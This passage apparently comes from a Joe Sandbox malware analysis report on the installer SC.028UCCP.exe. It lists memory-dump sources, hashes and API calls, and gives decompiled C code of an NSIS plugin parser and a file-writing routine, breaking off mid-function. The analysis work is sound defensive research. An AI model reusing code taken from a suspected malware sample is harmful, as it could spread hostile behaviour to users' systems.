                                  • Error launching installer, xrefs: 00402C83
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
                                  • "C:\Users\user\Desktop\SC.028UCCP.exe", xrefs: 00402C33
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                  • String ID: "C:\Users\user\Desktop\SC.028UCCP.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SC.028UCCP.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                  • API String ID: 4283519449-3078379064
                                  • Opcode ID: e1ae569de8707ad257aa271524bc1f490828c5d2cae056f7a9dfb35c885d2983
                                  • Instruction ID: 8bc35dde1f4d805c720579c209d35afe3860aa9343481584d03e725a70eefc79
                                  • Opcode Fuzzy Hash: e1ae569de8707ad257aa271524bc1f490828c5d2cae056f7a9dfb35c885d2983
                                  • Instruction Fuzzy Hash: 5A51E571900204ABDB209F65DE89B9E7BA8EB04355F10403FFD05B22D1D7BCAE418BAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E10001A86() {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				CHAR* _v24;
                                  				CHAR* _v28;
                                  				signed int _v32;
                                  				signed int _v36;
                                  				signed int _v40;
                                  				CHAR* _v44;
                                  				signed int _v48;
                                  				intOrPtr _v52;
                                  				void* _v56;
                                  				CHAR* _t184;
                                  				signed int _t186;
                                  				signed int _t187;
                                  				void* _t190;
                                  				void* _t192;
                                  				CHAR* _t194;
                                  				void* _t202;
                                  				struct HINSTANCE__* _t203;
                                  				signed int _t204;
                                  				signed int _t206;
                                  				struct HINSTANCE__* _t207;
                                  				signed int _t209;
                                  				void* _t210;
                                  				void* _t222;
                                  				signed char _t223;
                                  				void* _t228;
                                  				signed int _t230;
                                  				void* _t231;
                                  				void* _t232;
                                  				void* _t236;
                                  				void* _t239;
                                  				signed int _t241;
                                  				void* _t248;
                                  				void* _t249;
                                  				void* _t252;
                                  				signed int _t257;
                                  				signed char _t260;
                                  				void _t261;
                                  				void* _t262;
                                  				void* _t273;
                                  				void* _t274;
                                  				void* _t278;
                                  				void* _t279;
                                  				void* _t283;
                                  				void* _t284;
                                  				void* _t285;
                                  				void* _t286;
                                  				signed char _t289;
                                  				signed int _t290;
                                  				CHAR* _t291;
                                  				CHAR* _t293;
                                  				CHAR* _t294;
                                  				struct HINSTANCE__* _t295;
                                  				void* _t297;
                                  				void* _t298;
                                  
                                  				_t257 = 0;
                                  				_v32 = 0;
                                  				_v36 = 0;
                                  				_v16 = 0;
                                  				_v12 = 0;
                                  				_v40 = 0;
                                  				_t298 = 0;
                                  				_v48 = 0;
                                  				_t184 = E10001215();
                                  				_v24 = _t184;
                                  				_v28 = _t184;
                                  				_v44 = E10001215();
                                  				_t186 = E1000123B();
                                  				_v56 = _t186;
                                  				_v8 = _t186;
                                  				while(1) {
                                  					_t187 = _v32;
                                  					_t290 = 3;
                                  					_v52 = _t187;
                                  					if(_t187 != _t257 && _t298 == _t257) {
                                  						break;
                                  					}
                                  					_t289 =  *_v8;
                                  					_t260 = _t289;
                                  					_t190 = _t260 - _t257;
                                  					if(_t190 == 0) {
                                  						_v32 = _v32 | 0xffffffff;
                                  						L13:
                                  						_t192 = _v52 - _t257;
                                  						if(_t192 == 0) {
                                  							 *_v28 =  *_v28 & 0x00000000;
                                  							if(_t298 == _t257) {
                                  								_t228 = GlobalAlloc(0x40, 0x14a4); // executed
                                  								_t298 = _t228;
                                  								 *(_t298 + 0x810) = _t257;
                                  								 *(_t298 + 0x814) = _t257;
                                  							}
                                  							_t261 = _v36;
                                  							_t40 = _t298 + 8; // 0x8
                                  							_t194 = _t40;
                                  							_t41 = _t298 + 0x408; // 0x408
                                  							_t291 = _t41;
                                  							 *_t298 = _t261;
                                  							 *_t194 =  *_t194 & 0x00000000;
                                  							 *(_t298 + 0x808) = _t257;
                                  							 *_t291 =  *_t291 & 0x00000000;
                                  							_t262 = _t261 - _t257;
                                  							 *(_t298 + 0x80c) = _t257;
                                  							 *(_t298 + 4) = _t257;
                                  							if(_t262 == 0) {
                                  								if(_v28 == _v24) {
                                  									goto L56;
                                  								}
                                  								_t297 = 0;
                                  								GlobalFree(_t298);
                                  								_t298 = E1000131B(_v24);
                                  								if(_t298 == _t257) {
                                  									goto L56;
                                  								} else {
                                  									goto L28;
                                  								}
                                  								while(1) {
                                  									L28:
                                  									_t222 =  *(_t298 + 0x14a0);
                                  									if(_t222 == _t257) {
                                  										break;
                                  									}
                                  									_t297 = _t298;
                                  									_t298 = _t222;
                                  									if(_t298 != _t257) {
                                  										continue;
                                  									}
                                  									break;
                                  								}
                                  								if(_t297 != _t257) {
                                  									 *(_t297 + 0x14a0) = _t257;
                                  								}
                                  								_t223 =  *(_t298 + 0x810);
                                  								if((_t223 & 0x00000008) == 0) {
                                  									 *(_t298 + 0x810) = _t223 | 0x00000002;
                                  								} else {
                                  									_t298 = E10001551(_t298);
                                  									 *(_t298 + 0x810) =  *(_t298 + 0x810) & 0xfffffff5;
                                  								}
                                  								goto L56;
                                  							} else {
                                  								_t273 = _t262 - 1;
                                  								if(_t273 == 0) {
                                  									L24:
                                  									lstrcpyA(_t194, _v44);
                                  									L25:
                                  									lstrcpyA(_t291, _v24);
                                  									L56:
                                  									_v28 = _v24;
                                  									L57:
                                  									_v8 = _v8 + 1;
                                  									if(_v32 != 0xffffffff) {
                                  										continue;
                                  									}
                                  									break;
                                  								}
                                  								_t274 = _t273 - 1;
                                  								if(_t274 == 0) {
                                  									goto L25;
                                  								}
                                  								if(_t274 != 1) {
                                  									goto L56;
                                  								}
                                  								goto L24;
                                  							}
                                  						}
                                  						if(_t192 == 1) {
                                  							_t230 = _v16;
                                  							if(_v40 == _t257) {
                                  								_t230 = _t230 - 1;
                                  							}
                                  							 *(_t298 + 0x814) = _t230;
                                  						}
                                  						goto L56;
                                  					}
                                  					_t231 = _t190 - 0x23;
                                  					if(_t231 == 0) {
                                  						_v32 = _t257;
                                  						_v36 = _t257;
                                  						goto L13;
                                  					}
                                  					_t232 = _t231 - 5;
                                  					if(_t232 == 0) {
                                  						_v32 = 1;
                                  						_v12 = _t257;
                                  						_v20 = _t257;
                                  						_v16 = (0 | _v36 == _t290) + 1;
                                  						_v40 = _t257;
                                  						goto L13;
                                  					}
                                  					_t236 = _t232 - 1;
                                  					if(_t236 == 0) {
                                  						_v32 = 2;
                                  						_v12 = _t257;
                                  						_v20 = _t257;
                                  						goto L13;
                                  					}
                                  					if(_t236 != 0x16) {
                                  						_t239 = _v32 - _t257;
                                  						if(_t239 == 0) {
                                  							if(_t289 == 0x2a) {
                                  								_v36 = 2;
                                  								L55:
                                  								_t257 = 0;
                                  								goto L56;
                                  							}
                                  							if(_t289 == 0x2d) {
                                  								L125:
                                  								_t241 = _v8 + 1;
                                  								if( *_t241 != 0x3e) {
                                  									L127:
                                  									_t241 = _v8 + 1;
                                  									if( *_t241 != 0x3a || _t289 == 0x2d) {
                                  										L134:
                                  										_v28 =  &(_v28[1]);
                                  										 *_v28 = _t289;
                                  										goto L57;
                                  									} else {
                                  										_v36 = 1;
                                  										L130:
                                  										_v8 = _t241;
                                  										if(_v28 <= _v24) {
                                  											 *_v44 =  *_v44 & 0x00000000;
                                  										} else {
                                  											 *_v28 =  *_v28 & 0x00000000;
                                  											lstrcpyA(_v44, _v24);
                                  										}
                                  										goto L55;
                                  									}
                                  								}
                                  								_v36 = _t290;
                                  								goto L130;
                                  							}
                                  							if(_t289 != 0x3a) {
                                  								goto L134;
                                  							}
                                  							if(_t289 != 0x2d) {
                                  								goto L127;
                                  							}
                                  							goto L125;
                                  						}
                                  						_t248 = _t239 - 1;
                                  						if(_t248 == 0) {
                                  							L68:
                                  							_t249 = _t260 - 0x22;
                                  							if(_t249 > 0x55) {
                                  								goto L55;
                                  							}
                                  							switch( *((intOrPtr*)(( *(_t249 + 0x1000210f) & 0x000000ff) * 4 +  &M100020AF))) {
                                  								case 0:
                                  									__eax = _v24;
                                  									__edi = _v8;
                                  									while(1) {
                                  										__edi = __edi + 1;
                                  										_v8 = __edi;
                                  										__cl =  *__edi;
                                  										if(__cl == __dl &&  *(__edi + 1) != __dl) {
                                  											break;
                                  										}
                                  										if(__cl == 0) {
                                  											break;
                                  										}
                                  										if(__cl == __dl) {
                                  											__edi = __edi + 1;
                                  										}
                                  										__cl =  *__edi;
                                  										 *__eax =  *__edi;
                                  										__eax = __eax + 1;
                                  									}
                                  									 *__eax =  *__eax & 0x00000000;
                                  									__ebx = E10001224(_v24);
                                  									goto L84;
                                  								case 1:
                                  									_v12 = 1;
                                  									goto L55;
                                  								case 2:
                                  									_v12 = _v12 | 0xffffffff;
                                  									goto L55;
                                  								case 3:
                                  									_v12 = _v12 & 0x00000000;
                                  									_v20 = _v20 & 0x00000000;
                                  									_v16 = _v16 + 1;
                                  									goto L73;
                                  								case 4:
                                  									if(_v20 != 0) {
                                  										goto L55;
                                  									}
                                  									_v8 = _v8 - 1;
                                  									__ebx = E10001215();
                                  									 &_v8 = E10001A24( &_v8);
                                  									__eax = E10001446(__edx, __eax, __edx, __ebx);
                                  									goto L84;
                                  								case 5:
                                  									L92:
                                  									_v20 = _v20 + 1;
                                  									goto L55;
                                  								case 6:
                                  									_push(0x19);
                                  									goto L120;
                                  								case 7:
                                  									_push(0x15);
                                  									goto L120;
                                  								case 8:
                                  									_push(0x16);
                                  									goto L120;
                                  								case 9:
                                  									_push(0x18);
                                  									goto L120;
                                  								case 0xa:
                                  									_push(5);
                                  									goto L100;
                                  								case 0xb:
                                  									__eax = 0;
                                  									__eax = 1;
                                  									goto L78;
                                  								case 0xc:
                                  									_push(6);
                                  									goto L100;
                                  								case 0xd:
                                  									_push(2);
                                  									goto L100;
                                  								case 0xe:
                                  									_push(3);
                                  									goto L100;
                                  								case 0xf:
                                  									_push(0x17);
                                  									L120:
                                  									_pop(__ebx);
                                  									goto L85;
                                  								case 0x10:
                                  									__eax =  &_v8;
                                  									__eax = E10001A24( &_v8);
                                  									__ebx = __eax;
                                  									__ebx = __eax + 1;
                                  									if(__ebx < 0xb) {
                                  										__ebx = __ebx + 0xa;
                                  									}
                                  									goto L84;
                                  								case 0x11:
                                  									__ebx = 0xffffffff;
                                  									goto L85;
                                  								case 0x12:
                                  									_v48 = _v48 + 1;
                                  									_push(3);
                                  									_pop(__eax);
                                  									goto L78;
                                  								case 0x13:
                                  									__eax = 0;
                                  									goto L78;
                                  								case 0x14:
                                  									_push(4);
                                  									L100:
                                  									_pop(__eax);
                                  									L78:
                                  									__edi = _v16;
                                  									__ecx =  *((intOrPtr*)(0x10003058 + __eax * 4));
                                  									__edi = _v16 << 5;
                                  									__edx = 0;
                                  									__edi = (_v16 << 5) + __esi;
                                  									__edx = 1;
                                  									_v40 = 1;
                                  									 *(__edi + 0x818) = __eax;
                                  									if(_v12 == 0xffffffff || __ecx <= 0) {
                                  										__ecx = __edx;
                                  									}
                                  									 *((intOrPtr*)(__edi + 0x828)) = __ecx;
                                  									if(_v12 == __edx) {
                                  										__eax =  &_v8;
                                  										__eax = E10001A24( &_v8);
                                  										_v12 = __eax;
                                  									}
                                  									__eax = _v12;
                                  									 *((intOrPtr*)(__edi + 0x81c)) = _v12;
                                  									_t126 = _v16 + 0x41; // 0x41
                                  									_t126 = _t126 << 5;
                                  									__eax = 0;
                                  									 *((intOrPtr*)((_t126 << 5) + __esi)) = 0;
                                  									 *((intOrPtr*)(__edi + 0x82c)) = 0;
                                  									 *((intOrPtr*)(__edi + 0x830)) = 0;
                                  									goto L84;
                                  								case 0x15:
                                  									_t251 =  *(_t298 + 0x814);
                                  									if(_t251 > _v16) {
                                  										_v16 = _t251;
                                  									}
                                  									_v12 = _v12 & 0x00000000;
                                  									_v20 = _v20 & 0x00000000;
                                  									if(_t251 != (0 | _v36 == 0x00000003)) {
                                  										L73:
                                  										_v40 = 1;
                                  									}
                                  									goto L55;
                                  								case 0x16:
                                  									__eax =  &_v8;
                                  									__eax = E10001A24( &_v8);
                                  									__ebx = __eax;
                                  									__ebx = __eax + 1;
                                  									L84:
                                  									if(__ebx == 0) {
                                  										goto L55;
                                  									}
                                  									L85:
                                  									_v40 = 1;
                                  									if(_v20 == 0) {
                                  										_v16 = _v16 << 5;
                                  										_t134 = __esi + 0x82c; // 0x82c
                                  										__edi = (_v16 << 5) + _t134;
                                  										__eax =  *__edi;
                                  										if(__eax <= 0xffffffff || __eax > 0x19) {
                                  											__eax = GlobalFree(__eax);
                                  										}
                                  										 *__edi = __ebx;
                                  									}
                                  									if(_v20 == 1) {
                                  										_v16 = _v16 << 5;
                                  										 *((_v16 << 5) + __esi + 0x830) = __ebx;
                                  									}
                                  									goto L92;
                                  								case 0x17:
                                  									goto L55;
                                  							}
                                  						}
                                  						_t252 = _t248 - 1;
                                  						if(_t252 == 0) {
                                  							_v16 = _t257;
                                  							goto L68;
                                  						}
                                  						if(_t252 != 1) {
                                  							goto L134;
                                  						}
                                  						_t278 = _t260 - 0x21;
                                  						if(_t278 == 0) {
                                  							_v12 =  ~_v12;
                                  							goto L55;
                                  						}
                                  						_t279 = _t278 - 0x42;
                                  						if(_t279 == 0) {
                                  							L51:
                                  							if(_v12 != 1) {
                                  								 *(_t298 + 0x810) =  *(_t298 + 0x810) &  !0x00000001;
                                  							} else {
                                  								 *(_t298 + 0x810) =  *(_t298 + 0x810) | 1;
                                  							}
                                  							_v12 = 1;
                                  							goto L55;
                                  						}
                                  						_t283 = _t279;
                                  						if(_t283 == 0) {
                                  							_push(0x20);
                                  							L50:
                                  							_pop(1);
                                  							goto L51;
                                  						}
                                  						_t284 = _t283 - 9;
                                  						if(_t284 == 0) {
                                  							_push(8);
                                  							goto L50;
                                  						}
                                  						_push(4);
                                  						_pop(1);
                                  						_t285 = _t284 - 1;
                                  						if(_t285 == 0) {
                                  							goto L51;
                                  						}
                                  						_t286 = _t285 - 1;
                                  						if(_t286 == 0) {
                                  							_push(0x10);
                                  							goto L50;
                                  						}
                                  						if(_t286 != 0) {
                                  							goto L55;
                                  						}
                                  						_push(0x40);
                                  						goto L50;
                                  					} else {
                                  						_v32 = _t290;
                                  						_v12 = 1;
                                  						goto L13;
                                  					}
                                  				}
                                  				GlobalFree(_v56);
                                  				GlobalFree(_v24);
                                  				GlobalFree(_v44);
                                  				if(_t298 == _t257 ||  *(_t298 + 0x80c) != _t257) {
                                  					L148:
                                  					return _t298;
                                  				} else {
                                  					_t202 =  *_t298 - 1;
                                  					if(_t202 == 0) {
                                  						_t171 = _t298 + 8; // 0x8
                                  						_t293 = _t171;
                                  						if( *_t293 != 0) {
                                  							_t203 = GetModuleHandleA(_t293);
                                  							 *(_t298 + 0x808) = _t203;
                                  							if(_t203 != _t257) {
                                  								L144:
                                  								_t176 = _t298 + 0x408; // 0x408
                                  								_t294 = _t176;
                                  								_t204 = E100015C1( *(_t298 + 0x808), _t294);
                                  								 *(_t298 + 0x80c) = _t204;
                                  								if(_v48 != _t257 || _t204 == _t257) {
                                  									_t294[lstrlenA(_t294)] = 0x41;
                                  									_t206 = E100015C1( *(_t298 + 0x808), _t294);
                                  									if(_t206 != _t257) {
                                  										L138:
                                  										 *(_t298 + 0x80c) = _t206;
                                  										goto L148;
                                  									}
                                  									L147:
                                  									 *(_t298 + 4) =  *(_t298 + 4) | 0xffffffff;
                                  								}
                                  								goto L148;
                                  							}
                                  							_t207 = LoadLibraryA(_t293);
                                  							 *(_t298 + 0x808) = _t207;
                                  							if(_t207 == _t257) {
                                  								goto L147;
                                  							}
                                  							goto L144;
                                  						}
                                  						_t172 = _t298 + 0x408; // 0x408
                                  						_t209 = E1000131B(_t172);
                                  						 *(_t298 + 0x80c) = _t209;
                                  						if(_t209 != _t257) {
                                  							goto L148;
                                  						}
                                  						goto L147;
                                  					}
                                  					_t210 = _t202 - 1;
                                  					if(_t210 == 0) {
                                  						_t169 = _t298 + 0x408; // 0x408
                                  						_t211 = _t169;
                                  						if( *_t169 == 0) {
                                  							goto L148;
                                  						}
                                  						_t206 = E1000131B(_t211);
                                  						L137:
                                  						goto L138;
                                  					}
                                  					if(_t210 != 1) {
                                  						goto L148;
                                  					}
                                  					_t73 = _t298 + 8; // 0x8
                                  					_t258 = _t73;
                                  					_t295 = E1000131B(_t73);
                                  					 *(_t298 + 0x808) = _t295;
                                  					if(_t295 == 0) {
                                  						goto L147;
                                  					}
                                  					 *(_t298 + 0x850) =  *(_t298 + 0x850) & 0x00000000;
                                  					 *((intOrPtr*)(_t298 + 0x84c)) = E10001224(_t258);
                                  					 *(_t298 + 0x83c) =  *(_t298 + 0x83c) & 0x00000000;
                                  					 *((intOrPtr*)(_t298 + 0x848)) = 1;
                                  					 *((intOrPtr*)(_t298 + 0x838)) = 1;
                                  					_t82 = _t298 + 0x408; // 0x408
                                  					_t206 =  *(_t295->i + E1000131B(_t82) * 4);
                                  					goto L137;
                                  				}
                                  			}
                                  0x10001f85
                                  0x10001f91
                                  0x10001f94
                                  0x10001f98
                                  0x10001f9f
                                  0x10001fa2
                                  0x10001fa6
                                  0x10001fed
                                  0x10001ff0
                                  0x10001ff3
                                  0x00000000
                                  0x10001fad
                                  0x10001fad
                                  0x10001fb4
                                  0x10001fb4
                                  0x10001fbd
                                  0x10001fd9
                                  0x10001fbf
                                  0x10001fc8
                                  0x10001fcb
                                  0x10001fcb
                                  0x00000000
                                  0x10001fbd
                                  0x10001fa6
                                  0x10001f9a
                                  0x00000000
                                  0x10001f9a
                                  0x10001f8a
                                  0x00000000
                                  0x00000000
                                  0x10001f8f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x10001f8f
                                  0x10001c4c
                                  0x10001c4d
                                  0x10001d74
                                  0x10001d74
                                  0x10001d7c
                                  0x00000000
                                  0x00000000
                                  0x10001d89
                                  0x00000000
                                  0x10001f25
                                  0x10001f28
                                  0x10001f2b
                                  0x10001f2b
                                  0x10001f2c
                                  0x10001f2f
                                  0x10001f33
                                  0x00000000
                                  0x00000000
                                  0x10001f3c
                                  0x00000000
                                  0x00000000
                                  0x10001f40
                                  0x10001f42
                                  0x10001f42
                                  0x10001f43
                                  0x10001f45
                                  0x10001f47
                                  0x10001f47
                                  0x10001f4d
                                  0x10001f56
                                  0x00000000
                                  0x00000000
                                  0x10001dd0
                                  0x00000000
                                  0x00000000
                                  0x10001ddc
                                  0x00000000
                                  0x00000000
                                  0x10001dc3
                                  0x10001dc7
                                  0x10001dcb
                                  0x00000000
                                  0x00000000
                                  0x10001efb
                                  0x00000000
                                  0x00000000
                                  0x10001f01
                                  0x10001f09
                                  0x10001f10
                                  0x10001f18
                                  0x00000000
                                  0x00000000
                                  0x10001e94
                                  0x10001e94
                                  0x00000000
                                  0x00000000
                                  0x10001f75
                                  0x00000000
                                  0x00000000
                                  0x10001f65
                                  0x00000000
                                  0x00000000
                                  0x10001f69
                                  0x00000000
                                  0x00000000
                                  0x10001f71
                                  0x00000000
                                  0x00000000
                                  0x10001eb7
                                  0x00000000
                                  0x00000000
                                  0x10001e9c
                                  0x10001e9e
                                  0x00000000
                                  0x00000000
                                  0x10001ebf
                                  0x00000000
                                  0x00000000
                                  0x10001ea4
                                  0x00000000
                                  0x00000000
                                  0x10001ea8
                                  0x00000000
                                  0x00000000
                                  0x10001f6d
                                  0x10001f77
                                  0x10001f77
                                  0x00000000
                                  0x00000000
                                  0x10001ec7
                                  0x10001ecb
                                  0x10001ed0
                                  0x10001ed3
                                  0x10001ed7
                                  0x10001edd
                                  0x10001edd
                                  0x00000000
                                  0x00000000
                                  0x10001f5d
                                  0x00000000
                                  0x00000000
                                  0x10001eac
                                  0x10001eaf
                                  0x10001eb1
                                  0x00000000
                                  0x00000000
                                  0x10001de5
                                  0x00000000
                                  0x00000000
                                  0x10001ebb
                                  0x10001ec1
                                  0x10001ec1
                                  0x10001de7
                                  0x10001de7
                                  0x10001dea
                                  0x10001df1
                                  0x10001df4
                                  0x10001df6
                                  0x10001df8
                                  0x10001dfd
                                  0x10001e00
                                  0x10001e06
                                  0x10001e0c
                                  0x10001e0c
                                  0x10001e11
                                  0x10001e17
                                  0x10001e19
                                  0x10001e1d
                                  0x10001e24
                                  0x10001e24
                                  0x10001e27
                                  0x10001e2a
                                  0x10001e33
                                  0x10001e36
                                  0x10001e39
                                  0x10001e3b
                                  0x10001e3e
                                  0x10001e44
                                  0x00000000
                                  0x00000000
                                  0x10001d90
                                  0x10001d99
                                  0x10001d9b
                                  0x10001d9b
                                  0x10001d9e
                                  0x10001da2
                                  0x10001db1
                                  0x10001db7
                                  0x10001db7
                                  0x10001db7
                                  0x00000000
                                  0x00000000
                                  0x10001ee5
                                  0x10001ee9
                                  0x10001eee
                                  0x10001ef1
                                  0x10001e4a
                                  0x10001e4c
                                  0x00000000
                                  0x00000000
                                  0x10001e52
                                  0x10001e56
                                  0x10001e5d
                                  0x10001e62
                                  0x10001e65
                                  0x10001e65
                                  0x10001e6c
                                  0x10001e71
                                  0x10001e79
                                  0x10001e79
                                  0x10001e7f
                                  0x10001e7f
                                  0x10001e85
                                  0x10001e8a
                                  0x10001e8d
                                  0x10001e8d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x10001d89
                                  0x10001c53
                                  0x10001c54
                                  0x10001d71
                                  0x00000000
                                  0x10001d71
                                  0x10001c5b
                                  0x00000000
                                  0x00000000
                                  0x10001c61
                                  0x10001c64
                                  0x10001cad
                                  0x00000000
                                  0x10001cad
                                  0x10001c66
                                  0x10001c69
                                  0x10001c91
                                  0x10001c97
                                  0x10001d63
                                  0x10001c9d
                                  0x10001c9d
                                  0x10001c9d
                                  0x10001d69
                                  0x00000000
                                  0x10001d69
                                  0x10001c6c
                                  0x10001c6d
                                  0x10001c8e
                                  0x10001c90
                                  0x10001c90
                                  0x00000000
                                  0x10001c90
                                  0x10001c6f
                                  0x10001c72
                                  0x10001c8a
                                  0x00000000
                                  0x10001c8a
                                  0x10001c74
                                  0x10001c76
                                  0x10001c77
                                  0x10001c79
                                  0x00000000
                                  0x00000000
                                  0x10001c7b
                                  0x10001c7c
                                  0x10001c86
                                  0x00000000
                                  0x10001c86
                                  0x10001c80
                                  0x00000000
                                  0x00000000
                                  0x10001c82
                                  0x00000000
                                  0x10001afc
                                  0x10001afc
                                  0x10001aff
                                  0x00000000
                                  0x10001aff
                                  0x10001af6
                                  0x10001cce
                                  0x10001cd3
                                  0x10001cd8
                                  0x10001cdc
                                  0x100020a8
                                  0x100020ae
                                  0x10001cee
                                  0x10001cf0
                                  0x10001cf1
                                  0x1000201b
                                  0x1000201b
                                  0x10002021
                                  0x1000203d
                                  0x10002045
                                  0x1000204b
                                  0x1000205e
                                  0x1000205e
                                  0x1000205e
                                  0x1000206b
                                  0x10002075
                                  0x1000207b
                                  0x10002089
                                  0x10002095
                                  0x1000209e
                                  0x10002010
                                  0x10002010
                                  0x00000000
                                  0x10002010
                                  0x100020a4
                                  0x100020a4
                                  0x100020a4
                                  0x00000000
                                  0x1000207b
                                  0x1000204e
                                  0x10002056
                                  0x1000205c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1000205c
                                  0x10002023
                                  0x1000202a
                                  0x10002032
                                  0x10002038
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1000203a
                                  0x10001cf7
                                  0x10001cf8
                                  0x10001ffa
                                  0x10001ffa
                                  0x10002003
                                  0x00000000
                                  0x00000000
                                  0x1000200a
                                  0x1000200f
                                  0x00000000
                                  0x1000200f
                                  0x10001cff
                                  0x00000000
                                  0x00000000
                                  0x10001d05
                                  0x10001d05
                                  0x10001d0e
                                  0x10001d13
                                  0x10001d19
                                  0x00000000
                                  0x00000000
                                  0x10001d1f
                                  0x10001d2c
                                  0x10001d32
                                  0x10001d3c
                                  0x10001d42
                                  0x10001d4a
                                  0x10001d5a
                                  0x00000000
                                  0x10001d5a

                                  APIs
                                    • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001251,?,?,100014DE,?,10001020,10001019,00000001), ref: 1000121D
                                    • Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,00000001), ref: 10001258
                                    • Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269
                                  • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001B76
                                  • lstrcpyA.KERNEL32(00000008,?), ref: 10001BC2
                                  • lstrcpyA.KERNEL32(00000408,?), ref: 10001BCC
                                  • GlobalFree.KERNEL32 ref: 10001BE6
                                  • GlobalFree.KERNEL32 ref: 10001CCE
                                  • GlobalFree.KERNEL32 ref: 10001CD3
                                  • GlobalFree.KERNEL32 ref: 10001CD8
                                  • GlobalFree.KERNEL32 ref: 10001E79
                                  • lstrcpyA.KERNEL32(?,?), ref: 10001FCB
                                  • GetModuleHandleA.KERNEL32(00000008), ref: 1000203D
                                  • LoadLibraryA.KERNEL32(00000008), ref: 1000204E
                                  • lstrlenA.KERNEL32(00000408), ref: 10002082
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.798233791.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                  • Associated: 00000000.00000002.798214888.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000000.00000002.798250041.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000000.00000002.798280096.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10000000_SC.jbxd
                                  Similarity
                                  • API ID: Global$Free$lstrcpy$Alloc$HandleLibraryLoadModulelstrlen
                                  • String ID:
                                  • API String ID: 226667998-0
                                  • Opcode ID: 8ec8fb265bc8d5da7aa9ee2d86766b0fc4af6a504ffa790e167c9f5f819e0430
                                  • Instruction ID: dbefa70d923fed6e2c1f4067a34d9ed24c8bf5ef1377c6d65b2935cebb3f649c
                                  • Opcode Fuzzy Hash: 8ec8fb265bc8d5da7aa9ee2d86766b0fc4af6a504ffa790e167c9f5f819e0430
                                  • Instruction Fuzzy Hash: E0128971D0464ADEFB20CFA4C8817EEBBF4FB043D0F21852AE595E6189DB749A81CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 60%
                                  			E0040173F(FILETIME* __ebx, void* __eflags) {
                                  				void* _t33;
                                  				void* _t41;
                                  				void* _t43;
                                  				FILETIME* _t49;
                                  				FILETIME* _t62;
                                  				void* _t64;
                                  				signed int _t70;
                                  				FILETIME* _t71;
                                  				FILETIME* _t75;
                                  				signed int _t77;
                                  				void* _t80;
                                  				CHAR* _t82;
                                  				void* _t85;
                                  
                                  				_t75 = __ebx;
                                  				_t82 = E00402A07(0x31);
                                  				 *(_t85 - 8) = _t82;
                                  				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
                                  				_t33 = E004056B2(_t82);
                                  				_push(_t82);
                                  				if(_t33 == 0) {
                                  					lstrcatA(E00405645(E00405B98(0x409bc0, "C:\\Users\\hardz\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter\\cavil\\Ablativers91")), ??);
                                  				} else {
                                  					_push(0x409bc0);
                                  					E00405B98();
                                  				}
                                  				E00405E03(0x409bc0);
                                  				while(1) {
                                  					__eflags =  *(_t85 + 8) - 3;
                                  					if( *(_t85 + 8) >= 3) {
                                  						_t64 = E00405E9C(0x409bc0);
                                  						_t77 = 0;
                                  						__eflags = _t64 - _t75;
                                  						if(_t64 != _t75) {
                                  							_t71 = _t64 + 0x14;
                                  							__eflags = _t71;
                                  							_t77 = CompareFileTime(_t71, _t85 - 0x18);
                                  						}
                                  						asm("sbb eax, eax");
                                  						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                  						__eflags = _t70;
                                  						 *(_t85 + 8) = _t70;
                                  					}
                                  					__eflags =  *(_t85 + 8) - _t75;
                                  					if( *(_t85 + 8) == _t75) {
                                  						E00405821(0x409bc0);
                                  					}
                                  					__eflags =  *(_t85 + 8) - 1;
                                  					_t41 = E00405846(0x409bc0, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                  					__eflags = _t41 - 0xffffffff;
                                  					 *(_t85 - 0x34) = _t41;
                                  					if(_t41 != 0xffffffff) {
                                  						break;
                                  					}
                                  					__eflags =  *(_t85 + 8) - _t75;
                                  					if( *(_t85 + 8) != _t75) {
                                  						E00404EA5(0xffffffe2,  *(_t85 - 8));
                                  						__eflags =  *(_t85 + 8) - 2;
